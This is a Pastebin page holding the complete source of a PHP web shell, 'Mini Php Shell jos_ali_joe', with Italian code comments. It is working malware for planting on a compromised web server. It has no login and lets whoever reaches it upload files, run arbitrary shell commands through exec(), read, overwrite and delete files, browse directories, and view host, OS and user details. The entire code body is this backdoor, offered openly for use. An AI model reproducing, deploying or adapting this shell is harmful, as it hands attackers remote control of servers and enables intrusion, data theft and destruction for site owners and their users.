API tools faq
paste
Advertisement
0x706c7a622e676f762e

Mini Shell.

0x706c7a622e676f762e
Oct 12th, 2013
9,486
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.82 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>Mini Php Shell jos_ali_joe</title>
  4. <style type="text/css">
  5. a {
  6. text-decoration: none;
  7. display: block;
  8. }
  9.  
  10. a img {
  11. border: 0;
  12. }
  13.  
  14. #view tr:hover {
  15. background-color: #FFFFFF;
  16. }
  17.  
  18. input {
  19. font-family: Courier New, Courier, Fixed;
  20. font-size: 15px;
  21. background-color: #FFFFFF;
  22. color: #000000;
  23. }
  24.  
  25. input:hover {
  26. background-color: #000000;
  27. }
  28.  
  29. textarea {
  30. font-family: Courier New, Courier, Fixed;
  31. font-size: 15px;
  32. background-color: #FFFFFF;
  33. color: #000000;
  34. }
  35.  
  36. body {
  37. font-family: Courier New, Courier, Fixed;
  38. font-size: 10px;
  39. color: #FFFFFF;
  40. }
  41.  
  42. table#bordered {
  43. border: 1px solid #FFFFFF;
  44. background-color: #000;
  45. font-family: Courier New, Courier, Fixed;
  46. font-size: 15px;
  47. color: #FFFFFF;
  48. }
  49.  
  50. form#post {}
  51.  
  52. #post .buttons {
  53. background-color: transparent;
  54. font-family: Arial;
  55. font-size: 15px;
  56. color: #777;
  57. border: 0;
  58. }
  59.  
  60. #cell {
  61. border-bottom: 1px #FFFFFF dotted;
  62. }
  63. </style>
  64. </head>
  65.  
  66. <body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
  67. <h1 style='color: #fff'><u><a href="<?php print $_SERVER['PHP_SELF']; ?>" style="color: #fff">
  68. Mini Php Shell jos_ali_joe V27.9</a></u></h1>
  69. <p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http://explorecrew.org/" style="display: inline;
  70. color: #fff">http://explorecrew.org/</a></u><br> # Contact : ali@explorecrew.org </u></p><br>
  71.  
  72. <table border=0 id="bordered">
  73.  
  74. <?php
  75. function getperms($f) {
  76. $mode=fileperms($f);
  77.  
  78. $perm='';
  79. $perm .= ($mode & 00400) ? 'r' : '-';
  80. $perm .= ($mode & 00200) ? 'w' : '-';
  81. $perm .= ($mode & 00100) ? 'x' : '-';
  82. $perm .= ($mode & 00040) ? 'r' : '-';
  83. $perm .= ($mode & 00020) ? 'w' : '-';
  84. $perm .= ($mode & 00010) ? 'x' : '-';
  85. $perm .= ($mode & 00004) ? 'r' : '-';
  86. $perm .= ($mode & 00002) ? 'w' : '-';
  87. $perm .= ($mode & 00001) ? 'x' : '-';
  88.  
  89. return $perm;
  90. }
  91.  
  92. print "<tr><td>~ host </td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
  93. print "<tr><td>~ server </td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
  94. if (is_callable("php_uname"))
  95. print "<tr><td>~ os </td><td><b>".php_uname()."</b></td></tr>";
  96.  
  97. if (is_callable("posix_getuid") and is_callable("posix_getgid")) {
  98. $uid=posix_getuid();
  99. $uname=posix_getpwuid($uid);
  100. $uname=$uname['name'];
  101.  
  102. $gid=posix_getgid();
  103. $gname=posix_getgrgid($gid);
  104. $gname=$gname['name'];
  105.  
  106. print "<tr><td>~ uid </td><td><b>$uid ($uname)</b></td></tr>";
  107. print "<tr><td>~ gid </td><td><b>$gid ($gname)</b></td></tr>";
  108. }
  109.  
  110. print "</table><br><br>";
  111.  
  112. if (!isset($_POST['file'])) {
  113. ?>
  114.  
  115. <table border=0 style="font-size: 12px">
  116.  
  117. <form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
  118. <input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
  119. <input type="hidden" name="do_upload" value="true">
  120. <tr><td>&gt; Upload Data</td></tr>
  121. <tr><td><input type="file" name="userfile"/></td></tr>
  122. <tr><td><input type="submit" value="> send"/></td></tr>
  123. </form>
  124.  
  125. <tr><td height="20px"></td></tr>
  126.  
  127. <form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
  128. <tr><td>> Comand</td></tr>
  129. <tr><td><input type="text" name="cmd"></td></tr>
  130. <tr><td><input type="submit" value="> execute cmd"></td></tr>
  131. </form>
  132. </table>
  133.  
  134. <?php
  135. }
  136.  
  137. #
  138. # Upload di file
  139. #
  140. if ($_POST['do_upload']==="true") {
  141. if ($_POST['dir']=="true")
  142. $dir=$_POST['dirname'];
  143. else
  144. $dir=getcwd();
  145.  
  146. $uploadfile=$dir."/".basename($_FILES['userfile']['name']);
  147.  
  148. if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) {
  149. print "File successfully loaded<br>\n";
  150. print "~ file name: <b>".$_FILES['userfile']['name']."</b><br>".
  151. "\n~ type: ".$_FILES['userfile']['type']."<br>\n".
  152. "~ size: ".$_FILES['userfile']['size']." bytes<br>\n";
  153. }
  154.  
  155. else print "$ Error while loading ".$_FILES['userfile']['name']."<br>\n";
  156. }
  157.  
  158. #
  159. # Modifica o cancellazione di file
  160. #
  161. if (isset($_POST['dofile'])) {
  162. $ref=$_SERVER['HTTP_REFERER'];
  163. $fname=htmlentities($_POST['dofile']);
  164. $content=$_POST['content'];
  165.  
  166. #
  167. # Modifica
  168. #
  169. if (isset($_POST['save'])) {
  170. if (!($fp=fopen($fname,"w")))
  171. die ("$ Unable to write to <b>$fname</b><br>\n");
  172.  
  173. fputs ($fp,$content);
  174. fclose($fp);
  175.  
  176. print ("File <b>$fname</b> successfully updated<br><br>\n");
  177. }
  178.  
  179. #
  180. # Cancellazione
  181. #
  182. if (isset($_POST['remove'])) {
  183. unlink ($fname) or die ("$ Unable to remove <b>$fname</b><br>\n");
  184. print "<b>$fname</b> successfully removed<br><br>\n";
  185. }
  186. }
  187.  
  188. #
  189. # Esecuzione di un comando
  190. #
  191. if (isset($_POST['cmd'])) {
  192. $cmd=$_POST['cmd'];
  193. $output=array();
  194. exec ($cmd,$output);
  195.  
  196. print "<br><hr height=1 width=\"100%\">\n";
  197. print "# cmd output: <br><br><tt>";
  198. print "<div style=\"border: 1px solid #FFFFFF; background-color: #000; padding: 10px\">\n";
  199.  
  200. foreach ($output as $line)
  201. print "$line<br>\n";
  202. print "</div></tt>\n";
  203. die('');
  204. }
  205.  
  206. #
  207. # Visualizzazione di file
  208. #
  209. if (isset($_POST['fname'])) {
  210. print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";
  211.  
  212. $fname=htmlentities($_POST['fname']);
  213. $file=file($fname) or print "$ Unable to open <b>$fname</b><br>\n";
  214.  
  215. print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
  216. print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
  217. print "<textarea rows=20 cols=80 name=\"content\">";
  218.  
  219. for ($i=0; $i<count($file); $i++)
  220. print htmlentities($file[$i]);
  221.  
  222. print "</textarea><br><br>\n";
  223. print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
  224. print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
  225. print "</form>\n";
  226. }
  227.  
  228. #
  229. # Visualizzazione del contenuto di una directory
  230. #
  231. if (isset($_POST['dirname']))
  232. $path=htmlspecialchars($_POST['dirname']);
  233. else
  234. $path=getcwd();
  235.  
  236. $dp=opendir($path) or die("$ Unable to open <b>$path</b><br>\n");
  237. chdir ($path);
  238. $path=getcwd();
  239.  
  240. print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
  241. print "<font color=\"white\">&gt; cwd: <b>".getcwd()."</b></font><br><br>\n\n";
  242. $dir=array();
  243.  
  244. while ($file=readdir($dp))
  245. if (strcmp(".",$file))
  246. array_push($dir,"$path/$file");
  247.  
  248. closedir($dp);
  249. sort($dir);
  250.  
  251. ?>
  252.  
  253. <form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
  254. <table border=0 width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
  255. <?php
  256. for ($i=0; $i<count($dir); $i++) {
  257. print "<tr style='font-family: Arial; font-size: 11px;'>\n";
  258.  
  259. #
  260. # Directory superiore
  261. #
  262. if (basename($dir[$i])==="..") {
  263. $tmp=split('/',getcwd());
  264. $new="";
  265.  
  266. for ($j=0; $j<count($tmp)-1; $j++)
  267. $new .= $tmp[$j]."/";
  268.  
  269. print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
  270. print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
  271. }
  272.  
  273. #
  274. # Directory
  275. #
  276. if (is_dir($dir[$i])) {
  277. if (basename($dir[$i])!='..') {
  278. print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
  279. print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
  280. "\" class=\"buttons\"></td>\n";
  281. print "<td id=\"cell\">DIR</td></tr>\n";
  282. }
  283. }
  284.  
  285. #
  286. # File comune
  287. #
  288. else {
  289. if (basename($dir[$i])!='..') {
  290. print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
  291. print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
  292. print "<td id=\"cell\">".getperms($dir[$i])."</td></tr>\n";
  293. }
  294. }
  295. }
  296.  
  297. print "</table></div>\n";
  298. ?>
  299.  
  300. </body>
  301. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!